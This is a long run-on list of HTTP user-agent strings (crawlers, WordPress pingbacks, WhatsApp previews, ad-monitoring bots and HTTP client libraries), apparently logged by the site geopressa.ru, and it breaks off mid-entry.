https://geopressa.ru +WhatsApp/2.21.71.1 i +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/76.0.3803.0 Safari/537.36 SeoSiteCheckup (https://seositecheckup.com) +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Mobile Safari/537.36 PTST/210416.214413 +WordPress/5.2.10; http://test.children4future.org +WordPress/5.6.3; https://blogchain.com.ua +google.ru +Java/1.8.0_291 +yacybot (-global; amd64 FreeBSD 12.2-RELEASE-p4; java 1.8.0_275; Europe/en) http://yacy.net/bot.html +WordPress/4.8.15; https://www.fit-4-live.com/wordpress +python-requests/2.7.0 CPython/2.7.18 Windows/2008ServerR2 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; http://www.google.com/bot.html),gzip(gfe) +WordPress/5.1.2; https://www.feuerwehr.niedersachsen.de +webcollage/1.182 +yacybot (/global; amd64 Windows 10 10.0; java 1.8.0_282; Europe/de) http://yacy.net/bot.html +Sistrix-Optimizer/1.0 (compatible; Googlebot/2.1) +python-requests/2.5.1 CPython/2.7.17 Linux/4.18.0-147.3.1.el8_1.x86_64 +Apache-HttpClient/4.5.1 (Java/1.8.0_282) +python-requests/2.4.3 CPython/2.7.9 Linux/3.16.0-5-amd64 +yacybot (/global; amd64 Linux 5.11.12-gentoo; java 11.0.10; Europe/de) http://yacy.net/bot.html +WordPress/3.0.5; http://intranet.main-hautarzt.de +HotJava 1.0.1 +ColdFusion +WordPress.com; http://www.mac-es-dir.de +WhatsApp/2.21.5.17 Android/11 Device/samsung-SM-A515F +HotJava 1.1.2 +WordPress/5.6.2; https://www.nekoesports.de +PHP/6.2.41 +PHP/5.3.16 +PHP/6.3.00 +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; QQPinyin 686; QQDownload 661; GTB6.6; TencentTraveler 4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506) +WordPress/5.6.2; http://www.nekoesports.de +PHP/5.2.54 +Mozilla/5.0 (compatible;WI Job Roboter Spider Version 3; https://www.webintegration.at) +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.24.1.el7.x86_64 +PHP/6.3.58 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618624779-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618629547-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.80 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.7.1; https://katherineheiglcollection.com +WordPress/5.7.1; http://wildfire.asia +WordPress/5.7.1; https://eurolearnit.org +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618675387-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618680448-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618675389-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618680449-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618626421-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618631587-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618680021-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618680023-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618692147-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618692150-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.82 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WordPress/5.5.4; http://www.centr7pyadei.ru +Screaming Frog SEO Spider/15.1 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1618695954-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 PTST/210416.214413 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 Edg/89.0.774.50 +WordPress/5.7; https://thecybermaven.com +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618781813-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618783830-10 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) adbeat.com/policy Gecko/20100101 Firefox/87.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.54 +WhatsApp/2.21.70.14 i +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.130 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html),gzip(gfe) +WordPress/5.7.1; https://biyoterapi.com +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.83 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +curl/7.76.1 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.8.806 (SpeedMode; Proxy; Android 5.1.1; D5503 ) U2/1.0.0 Mobile +curl/7.19.6 (i686-pc-cygwin) libcurl/7.19.6 OpenSSL/0.9.8n zlib/1.2.3 libidn/1.18 libssh2/1.2 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.63 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 +WhatsApp/2.21.9.1 A +Mozilla/5.0 (Windows NT 6.3; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 +WhatsApp/2.21.8.11 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618849723-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618857904-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/89.0.4389.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/89.0.4389.127 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; GoogleAdwordsExpress) Chrome/89.0.4389.127 Safari/537.36 +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/90.0.4430.83 Mobile Safari/537.36 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Mobile Safari/537.36 PTST/210419.211328 +SVN/1.6.11 (r934486) neon/0.29.3 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618879252-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618886111-0 +WhatsApp/2.2114.8 N +WordPress/5.7.1; https://osandroids.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618879756-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618879598-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618884344-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618884339-10 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.86 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1618880424-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618882541-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618889176-0 +JS-Kit URL Resolver, http://js-kit.com/ +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618898815-0 +GuzzleHttp/6.5.5 curl/7.29.0 PHP/7.3.27 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618948132-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1618959354-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 PTST/210419.211328 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 6.0.1; LG-X230 ) U2/1.0.0 Mobile +WordPress/5.7.1; https://meshok-sovetov.ru +WordPress/5.7.1; https://2020.co.id +Wotbox/alpha0.x.x (bot@wotbox.com; http://www.wotbox.com) Java/1.4.1_02 +webbandit/4.xx.0 +APIs-Google (+https://developers.google.com/webmasters/APIs-Google.html)+Sa +WordPress/5.7.1; https://findfreelist.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618966200-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618979526-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619004657-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619004660-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619017788-10 +WhatsApp/2.21.9.2 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618970714-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1618983484-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619013597-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.7 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~surf702-hrd) +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.86 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619035204-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.88 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (en-us) AppleWebKit/537.36(KHTML, like Gecko; Google-Adwords-DisplayAds-WebRender;) Chrome/89.0.4389.127Safari/537.36 +WordPress/5.7.1; https://geopressa.ru EWWW/612 +Python-urllib/3.5,gzip(gfe) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619052244-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619061292-0 +WordPress/5.7.1; https://help.britecore.com +Mozilla/5.0 (compatible; PaperLiBot/2.1; https://support.paper.li/hc/en-us/articles/360006695637-PaperLiBot) +WordPress/5.7.1; https://drmiamitummytuck.com +WordPress/5.7.1; https://dropzee.xyz +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619074998-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619107480-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619107519-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619112061-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619114641-10 +WhatsApp/2.21.9.3 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619055382-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619062947-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619097253-0 +WordPress/5.7.1; https://iniciarbr.net +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619114419-0 +WhatsApp/2.21.8.13 A +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 PTST/210419.211328 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 9; SM-N910H ) U2/1.0.0 Mobile +WordPress/5.7.1; https://www.mrstransport.sk +WordPress/5.7.1; https://onlinetoolweb.com +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/90.0.4430.83 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619138275-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619146673-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619152415-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619152442-0 +WhatsApp/2.2114.9 N +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619152418-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619213201-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619141669-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619148540-0 +Mozilla/5.0 (compatible; Neevabot/1.0; +https://neeva.com/neevabot) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619207165-0 +yacybot (freeworld/global; amd64 Windows Server 2019 10.0; java 1.8.0_291; GMT-03:00/pt) http://yacy.net/bot.html +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619209630-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 5.0.2; SM-J701F ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 5.0; SM-N900 ) U2/1.0.0 Mobile +WordPress/5.7.1; https://writing-practices.com/login +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.2.1113 (SpeedMode; Proxy; Android 7.1.2; HTC_Desire_601_dual_sim ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619225347-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619236294-0 +PostmanRuntime/7.28.0 +WhatsApp/2.21.72.1 i +YOURLS v1.7.2 +http://yourls.org/ (running on https://hts.io) +Apache-HttpClient/4.5.2 (Java/1.8.0_282) +WordPress/5.7.1; https://extreamjoy.xyz +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619223202-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619223204-10 +WhatsApp/2.21.9.5 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619228982-0 +WhatsApp/2.21.9.4 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619238454-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.1.2.571 (SpeedMode; Proxy; Android 6.0; TECNO_L8_Lite ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619290570-0 +WordPress/5.7.1; https://sdelaicomp.ru +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_3) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 +WordPress/5.7.1; https://rucore.net/p +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619309995-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619388619-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619313306-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1619321438-0 +Mozilla/5.0 (compatible; alexa site audit/1.0; +http://www.alexa.com/help/webmasters; no-reply@alexa.com) +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1619391521-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.0.1180 (SpeedMode; Proxy; Android 7.1.1; SM-J727T1 ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 7.1.1; SM-J330G ) U2/1.0.0 Mobile +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Mobile Safari/537.36 PTST/190509.230546 PTST/210419.211328 +Iframely/1.6.0 (+http://ohhtee.com) +WordPress/5.7.1; https://7th-studio.ru +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.4 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.4 facebookexternalhit/1.1 Twitterbot/1.0 +WordPress/5.5.4; https://galaktyczny.pl +WordPress/5.5.4; https://kodypromocyjne.info +WordPress/5.5.4; https://gourmetbasket.com.au +python-requests/2.7.0 CPython/2.7.18 Windows/8.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619471502-10 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~surf702-hrd) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619399171-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619399178-0 +WordPress/5.7.1; https://rusrokers.ru +Tiny Tiny RSS/21.04-0f61675cd (http://tt-rss.org/) +Tiny Tiny RSS/19.8 (8e8fd73) (http://tt-rss.org/) +WordPress/5.7.1; https://7th-studio.ru EWWW/612 +Apache-HttpClient/4.5.9 (Java/1.8.0_292) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619433329-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619433389-0 +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/89.0.4389.130 Mobile Safari/537.36 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/89.0.4389.130 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619433328-60 +Mozilla/5.0 (compatible; Qwantify/1.0; +https://www.qwant.com/) +WordPress/5.7.1; http://www.omgholysmoke.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619433327-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1619433389-10 +Mozilla/5.0 (compatible; Google-Apps-Script; beanserver; +https://script.google.com; id: 